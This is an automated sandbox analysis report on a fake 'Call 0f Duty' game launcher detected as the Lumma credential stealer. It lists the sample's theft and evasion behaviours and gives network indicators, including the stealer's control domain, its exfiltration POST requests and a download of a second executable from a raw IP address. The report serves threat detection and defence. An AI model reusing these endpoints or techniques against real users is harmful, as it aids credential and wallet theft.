Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Call 0f Duty A1 Launcher.exe

Overview

General Information

Sample name:Call 0f Duty A1 Launcher.exe
Analysis ID:1561495
MD5:fad119b9db79ccbfe3a65a13f0822b22
SHA1:db0992d62adb36a46b493063dd5192bb27422bb9
SHA256:27550a73b832d92b6a6a3869f0dedbb826c7c97348587342fe02c8c7cf98e0b9
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Call 0f Duty A1 Launcher.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe" MD5: FAD119B9DB79CCBFE3A65A13F0822B22)
    • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Call 0f Duty A1 Launcher.exe (PID: 4832 cmdline: "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe" MD5: FAD119B9DB79CCBFE3A65A13F0822B22)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2112166479.0000000003572000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000003.2133799366.0000000003572000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2156727898.0000000003573000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2089652859.0000000003573000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2133185254.0000000003572000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:11:39.821460+010020283713Unknown Traffic192.168.2.549704104.21.33.116443TCP
              2024-11-23T15:11:42.030345+010020283713Unknown Traffic192.168.2.549705104.21.33.116443TCP
              2024-11-23T15:11:44.427022+010020283713Unknown Traffic192.168.2.549706104.21.33.116443TCP
              2024-11-23T15:11:46.552360+010020283713Unknown Traffic192.168.2.549707104.21.33.116443TCP
              2024-11-23T15:11:48.833057+010020283713Unknown Traffic192.168.2.549708104.21.33.116443TCP
              2024-11-23T15:11:51.369193+010020283713Unknown Traffic192.168.2.549709104.21.33.116443TCP
              2024-11-23T15:11:53.832174+010020283713Unknown Traffic192.168.2.549710104.21.33.116443TCP
              2024-11-23T15:11:57.920823+010020283713Unknown Traffic192.168.2.549715104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:11:40.683329+010020546531A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
              2024-11-23T15:11:42.741185+010020546531A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
              2024-11-23T15:11:58.652710+010020546531A Network Trojan was detected192.168.2.549715104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:11:40.683329+010020498361A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:11:42.741185+010020498121A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:11:52.117288+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.33.116443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Call 0f Duty A1 Launcher.exeReversingLabs: Detection: 44%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.8% probability
              Source: Call 0f Duty A1 Launcher.exeJoe Sandbox ML: detected
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: number of queries: 1001
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0037C72A FindFirstFileExW,0_2_0037C72A
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0037C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0037C7DB

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 104.21.33.116:443
              Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
              Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.33.116:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZK0RYUZ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12779Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SKZN5Y6S87062KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15057Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A4DH3F0XIZIM96User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20547Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VOKUMYZPAHIZ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4IT2IB4L4W5OEVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572377Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667480216.0000000003501000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467865552.0000000003501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667480216.0000000003501000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467865552.0000000003501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/4
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667678398.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467635008.0000000003568000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667547897.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667678398.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exeZ
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667480216.0000000003501000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467865552.0000000003501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exec
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667442328.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2468014022.00000000034E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81:80/conhost.exeK
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133582502.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089652859.0000000003573000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667645205.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112166479.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/a
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667645205.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/accoC7
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.0000000003573000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112166479.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2181439440.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467635008.0000000003568000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2226749402.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2198258670.0000000003592000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667547897.0000000003568000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2198178296.000000000358D000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2466907303.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133185254.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2184884324.000000000357F000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667645205.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2159389391.000000000357F000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2159875202.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2133185254.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apij
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2468014022.00000000034E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiicrosoft
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2156727898.000000000356E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089867898.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2089972035.0000000005CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2134950405.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0036F4D00_2_0036F4D0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_003734D00_2_003734D0
